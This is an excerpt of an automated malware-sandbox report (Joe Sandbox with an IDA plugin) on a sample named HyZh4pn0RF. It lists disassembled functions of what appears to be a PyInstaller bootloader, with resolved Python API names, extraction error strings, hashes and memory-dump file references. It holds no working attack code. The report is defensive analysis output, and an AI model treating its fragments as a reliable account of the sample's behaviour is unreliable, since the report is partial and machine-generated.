Opcode Fuzzy Hash: 07f4a39e9cc2ad1441a8aa1ffea777e60b39e7c177a4820a8f2f9fbe0e0676c5
Instruction Fuzzy Hash: 6F31B432709BC242E764EB26A4405BDA6D5BBC4B90F64533AEA4D53BE6DF3CD402C714

Function 00007FF78F4A9E40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction ID: 011a1c386ea5cd552620972b0a35212e9d06c9f6766392f2f7d1894fde6a799b
Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
Instruction Fuzzy Hash: 0EF06271B182958AEBA49F29A842669B7D0F7883D5FE0D07AE68D83F14D63C9060CF14

Function 00007FF78F48C760 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction ID: 231adb4ad834cbbf5489981ba021cb245bca824fd0fafbade151e58c5441ef17
Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
Instruction Fuzzy Hash: 69A00131959886D0E645AB11A8500B0A620FB51344BA00032D10D820A0DF2CA545C220

Function 00007FF78F4851E0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F4851F0
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F48522A
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F48524F
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F485274
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F48529C
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F4852C4
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F4852EC
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F485314
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F48533C
GetProcAddress.KERNEL32(?,?,00000000,00007FF78F48346E), ref: 00007FF78F485364

Strings

PyConfig_SetString, xrefs: 00007FF78F4853AA
PySys_SetObject, xrefs: 00007FF78F485792
PyErr_Occurred, xrefs: 00007FF78F485472
Failed to get address for PyObject_Str, xrefs: 00007FF78F4856E6
Failed to get address for PyModule_GetDict, xrefs: 00007FF78F48561E
Py_InitializeFromConfig, xrefs: 00007FF78F485292
PyMarshal_ReadObjectFromString, xrefs: 00007FF78F4855B2
PyModule_GetDict, xrefs: 00007FF78F485602
PyObject_Str, xrefs: 00007FF78F4856CA
Failed to get address for PyImport_AddModule, xrefs: 00007FF78F48552E
PyUnicode_FromString, xrefs: 00007FF78F48585A
Failed to get address for PyErr_Print, xrefs: 00007FF78F4854B6
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF78F485556
PyImport_AddModule, xrefs: 00007FF78F485512
Failed to get address for Py_Finalize, xrefs: 00007FF78F485286
Failed to get address for PyList_Append, xrefs: 00007FF78F4855A6
Failed to get address for PyConfig_Read, xrefs: 00007FF78F485376
PyRun_SimpleStringFlags, xrefs: 00007FF78F48571A
PyConfig_Read, xrefs: 00007FF78F48535A
PyConfig_Clear, xrefs: 00007FF78F48530A
PyUnicode_Replace, xrefs: 00007FF78F4858AA
PyConfig_SetWideStringList, xrefs: 00007FF78F4853D2
PyUnicode_AsUTF8, xrefs: 00007FF78F4857BA
PyList_Append, xrefs: 00007FF78F48558A
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF78F48539E
PyErr_Fetch, xrefs: 00007FF78F485422
PyUnicode_Join, xrefs: 00007FF78F485882
Failed to get address for PyUnicode_FromString, xrefs: 00007FF78F485876
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF78F4853EE
Failed to get address for PyEval_EvalCode, xrefs: 00007FF78F485506
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF78F4852AE
Failed to get address for PySys_SetObject, xrefs: 00007FF78F4857AE
Failed to get address for PyUnicode_Join, xrefs: 00007FF78F48589E
PyErr_NormalizeException, xrefs: 00007FF78F48544A
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF78F48534E
Py_PreInitialize, xrefs: 00007FF78F4852E2
PyObject_SetAttrString, xrefs: 00007FF78F4856A2
PyEval_EvalCode, xrefs: 00007FF78F4854EA
Failed to get address for Py_IsInitialized, xrefs: 00007FF78F4852D6
Failed to get address for Py_DecodeLocale, xrefs: 00007FF78F48523C
PyImport_ExecCodeModule, xrefs: 00007FF78F48553A
Failed to get address for PyObject_CallFunction, xrefs: 00007FF78F485646
Failed to get address for PyErr_Restore, xrefs: 00007FF78F4854DE
Py_ExitStatusException, xrefs: 00007FF78F485245
PyStatus_Exception, xrefs: 00007FF78F485742
Failed to get address for PyErr_Occurred, xrefs: 00007FF78F48548E
Failed to get address for PyErr_Fetch, xrefs: 00007FF78F48543E
Py_DecodeLocale, xrefs: 00007FF78F485220
PyUnicode_FromFormat, xrefs: 00007FF78F485832
Failed to get address for PyConfig_SetString, xrefs: 00007FF78F4853C6
Py_IsInitialized, xrefs: 00007FF78F4852BA
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF78F48584E
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF78F485736
PyObject_GetAttrString, xrefs: 00007FF78F48567A
PyMem_RawFree, xrefs: 00007FF78F4855DA
Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF78F48570E
Failed to get address for PyStatus_Exception, xrefs: 00007FF78F48575E
PyObject_CallFunction, xrefs: 00007FF78F48562A
PyConfig_SetBytesString, xrefs: 00007FF78F485382
Failed to get address for Py_ExitStatusException, xrefs: 00007FF78F485261
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF78F48566E
PyErr_Print, xrefs: 00007FF78F48549A
PyImport_ImportModule, xrefs: 00007FF78F485562
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF78F4855CE
GetProcAddress, xrefs: 00007FF78F485209
PyUnicode_Decode, xrefs: 00007FF78F4857E2
Failed to get address for PyConfig_Clear, xrefs: 00007FF78F485326
Py_Finalize, xrefs: 00007FF78F48526A
Failed to get address for Py_DecRef, xrefs: 00007FF78F485202
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF78F4856BE
Py_DecRef, xrefs: 00007FF78F4851E6
PySys_GetObject, xrefs: 00007FF78F48576A
Failed to get address for PyUnicode_Replace, xrefs: 00007FF78F4858C6
Failed to get address for PySys_GetObject, xrefs: 00007FF78F485786
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF78F485466
Failed to get address for PyImport_ImportModule, xrefs: 00007FF78F48557E
Failed to get address for PyUnicode_Decode, xrefs: 00007FF78F4857FE
Failed to get address for Py_PreInitialize, xrefs: 00007FF78F4852FE
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF78F4857D6
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF78F485696
PyObject_CallFunctionObjArgs, xrefs: 00007FF78F485652
PyErr_Restore, xrefs: 00007FF78F4854C2
PyUnicode_DecodeFSDefault, xrefs: 00007FF78F48580A
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF78F4856F2
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF78F485826
PyErr_Clear, xrefs: 00007FF78F4853FA
Failed to get address for PyMem_RawFree, xrefs: 00007FF78F4855F6
Failed to get address for PyErr_Clear, xrefs: 00007FF78F485416
PyConfig_InitIsolatedConfig, xrefs: 00007FF78F485332

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction ID: f3837f3a9d02b046e50eb668deb91ae31c5d4856c59fcc566f5fc5218232a578
Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
Instruction Fuzzy Hash: 8A12B074A1FB8394FA96BB4AAC501F0A2A1BF45760BF45437C91E473A4EF7CE558C220

Function 00007FF78F4812B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F482B30: MessageBoxW.USER32 ref: 00007FF78F482C05

_fread_nolock.LIBCMT ref: 00007FF78F481499

Strings

fseek, xrefs: 00007FF78F481332
fread, xrefs: 00007FF78F4814C6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF78F4814BF
malloc, xrefs: 00007FF78F481377
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF78F48132B
%s%c%s, xrefs: 00007FF78F4813EE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF78F481370
\, xrefs: 00007FF78F4813F5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF78F4812FE

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: eb36bb45857c16b44edd36685c31993014ae0f224cc39bafccf1feedf175797d
Instruction ID: 1b9aa32740dfbd6eef897ca329c60c8c8f8cbc47d99188de9f591da529a1ba92
Opcode Fuzzy Hash: eb36bb45857c16b44edd36685c31993014ae0f224cc39bafccf1feedf175797d
Instruction Fuzzy Hash: 6C519331B296C345FA20B725A8516FAA394BF85784FE04033EE4E47B96EE7CE545C320

Function 00007FF78F4823F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF78F48241B
SelectObject.GDI32 ref: 00007FF78F482462
DrawTextW.USER32 ref: 00007FF78F482485
SelectObject.GDI32 ref: 00007FF78F48249B
ReleaseDC.USER32 ref: 00007FF78F4824AB
MoveWindow.USER32 ref: 00007FF78F4824FB
MoveWindow.USER32 ref: 00007FF78F48253B
MoveWindow.USER32 ref: 00007FF78F48258E
MoveWindow.USER32 ref: 00007FF78F4825D6

Strings

P%, xrefs: 00007FF78F48246F

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: c4d21a4a97cf4a4292a01ae01d7b6fe45d40bcc24e243dc856f366a3769741a6
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: C951E736618BA186D6249F26A4181BAF7A1F798B61F104126EBCE43695DF3CD085DB20

Function 00007FF78F4967A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4967E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F496BD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F496E70

Strings

f, xrefs: 00007FF78F496909
p, xrefs: 00007FF78F496911
-, xrefs: 00007FF78F49687D
p, xrefs: 00007FF78F496899
:, xrefs: 00007FF78F4969A0

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction ID: 28d34d712563fbb606df792e366f8e16d5b8a6b120df94383aed13c6675c2bf9
Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
Instruction Fuzzy Hash: DE125D72F0819386FB24AA14D154AF9A6A1FB80754FE48137E69D476E4FF3CE484CB24

Function 00007FF78F491108 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F491148
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F491510
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4917AF

Strings

f, xrefs: 00007FF78F4911E0
f, xrefs: 00007FF78F49124A
f, xrefs: 00007FF78F491395
p, xrefs: 00007FF78F4911ED
p, xrefs: 00007FF78F491252

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction ID: 87487d1d3ffb3d567f85639662f1178ef90672955b3b744dcca747892c7b509c
Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction Fuzzy Hash: 3E125D72F0828386FB60AA55A054AF9A261FB80750FE44137E69F477E4DB7CE480CB20

Function 00007FF78F4815A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF78F481610
fread, xrefs: 00007FF78F4816C9
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF78F4816C2
malloc, xrefs: 00007FF78F481640
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF78F481609
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF78F481639
Failed to extract %s: failed to open archive file!, xrefs: 00007FF78F4815D3

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: fc4d00e68c10bc6cfa12e2fd898941efbd925022891e855d312ef2fb0d8dc3ae
Instruction ID: d62ef731a3d152c9a9f09232222bef670092557b3c01b7afdf2eaea8e59c112c
Opcode Fuzzy Hash: fc4d00e68c10bc6cfa12e2fd898941efbd925022891e855d312ef2fb0d8dc3ae
Instruction Fuzzy Hash: EF315E31B296C246EA24BB56A8405FAE390BF447D4FE84433DE8E17B55EE3CE545C720

Function 00007FF78F48EB00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF78F48EB5D

Part of subcall function 00007FF78F48FA70: __GetUnwindTryBlock.LIBCMT ref: 00007FF78F48FAB3
Part of subcall function 00007FF78F48FA70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF78F48FAD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF78F48EC35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF78F48EE8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF78F48EF96

Strings

csm, xrefs: 00007FF78F48EC58
csm, xrefs: 00007FF78F48EB77
csm, xrefs: 00007FF78F48EBDE

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction ID: 2b1961045a6d713d026012f60854743af0b6a3c306c4d8d2e6c7c145ef381588
Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction Fuzzy Hash: 35E18072A287818AEB20ABA5D4403FDB7A0FB45798FA00536EF4D57B95DF38E580C710

Function 00007FF78F4886B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F488747
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F48879E

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF78F4887C6
WideCharToMultiByte, xrefs: 00007FF78F4887E6
Failed to get UTF-8 buffer size., xrefs: 00007FF78F4887DF
Out of memory., xrefs: 00007FF78F4887CF
win32_utils_to_utf8, xrefs: 00007FF78F4887D6

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 3d8cc197ee630c3fb00dd31b72f24074ca9fe52add05c6a83a64952da4f63ba4
Instruction ID: 564d14f2c40377129ea56d01277de55a08a7bc0b603e1ea27a36f01bac9645fe
Opcode Fuzzy Hash: 3d8cc197ee630c3fb00dd31b72f24074ca9fe52add05c6a83a64952da4f63ba4
Instruction Fuzzy Hash: 6B418232A19BC282E660EF16B8401BAF6A1FB84790FB44136DE8D47BA5DF3CD455C710

Function 00007FF78F488BF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F488C31

Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0

WideCharToMultiByte.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F488CA5

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF78F488CAF
WideCharToMultiByte, xrefs: 00007FF78F488C45, 00007FF78F488CB6
Failed to get UTF-8 buffer size., xrefs: 00007FF78F488C3E
Out of memory., xrefs: 00007FF78F488C6B
win32_utils_to_utf8, xrefs: 00007FF78F488C72

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
